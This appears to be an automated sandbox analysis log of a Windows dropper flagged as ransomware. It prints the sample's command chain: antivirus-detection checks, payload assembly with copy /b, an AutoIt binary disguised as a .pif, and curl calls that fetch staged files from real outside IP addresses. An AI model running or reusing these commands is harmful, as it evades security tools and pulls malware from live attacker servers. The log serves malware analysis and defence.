Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0A
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0X
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, Ur.pif, 0000000A.00000000.1743568156.00000000006D9000.00000002.00000001.01000000.00000006.sdmp, Million.0.dr, Ur.pif.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, zip.exe.50.drString found in binary or memory: http://www.info-zip.org/
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000000.2764607506.000000000041E000.00000002.00000001.01000000.00000007.sdmp, azvw.exe, 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp, zip.exe.50.dr, azvw.exe.10.drString found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: PsInfo64.exe.50.dr, PsInfo.exe.50.drString found in binary or memory: http://www.sysinternals.com
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Either.pif.90.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Bracket entropy: 7.99828269179
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Chairman entropy: 7.99705670912
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\During entropy: 7.99782535181
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Asked entropy: 7.99749706703
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Leaving entropy: 7.99804343585
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Perhaps entropy: 7.99302030214
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\Label entropy: 7.99832006496
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\139918\v entropy: 7.99961760371
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip entropy: 7.99812683975
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Showcase entropy: 7.99817987302
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Parts entropy: 7.99745443978
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Bailey entropy: 7.99784242676
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Samples entropy: 7.99803767944
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Considerations entropy: 7.99749833976
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Shepherd entropy: 7.99642551519
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Eight entropy: 7.99641122578
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Users\user\AppData\Local\Temp\Norman entropy: 7.99777953585
Source: curl.exeProcess created: 48
Source: cmd.exeProcess created: 60

System Summary

Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,86_2_00403883
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\EthnicEffect
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\LoWeed
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Windows\BeastalityGtk
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\TmpMoon
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\NotifiedAaron
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\BrushSub
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeFile created: C:\Windows\McLol
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040885050_2_00408850
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040C82050_2_0040C820
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041117050_2_00411170
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040E90050_2_0040E900
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040CE4950_2_0040CE49
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040CE5050_2_0040CE50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040221050_2_00402210
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00408EC050_2_00408EC0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00417EE350_2_00417EE3
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0040F28050_2_0040F280
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00409FD050_2_00409FD0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004093E050_2_004093E0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_0040497C86_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00406ED286_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_004074BB86_2_004074BB
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\139918\Ur.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00412920 appears 282 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: String function: 00406640 appears 48 times
Source: PsInfo.exe.50.drStatic PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Source: PsInfo64.exe.50.drStatic PE information: Resource name: BINRES type: PE32+ executable (console) x86-64, for MS Windows
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs vqMMwqCFZQ.exe
Source: vqMMwqCFZQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.rans.spre.evad.winEXE@298/62@1/2
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00412830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,50_2_00412830
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifFile created: C:\Users\user\AppData\Roaming\DolphinDumps
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsnDDCD.tmp
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
Source: vqMMwqCFZQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: vqMMwqCFZQ.exeReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeFile read: C:\Users\user\Desktop\vqMMwqCFZQ.exe
Source: unknownProcess created: C:\Users\user\Desktop\vqMMwqCFZQ.exe "C:\Users\user\Desktop\vqMMwqCFZQ.exe"
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
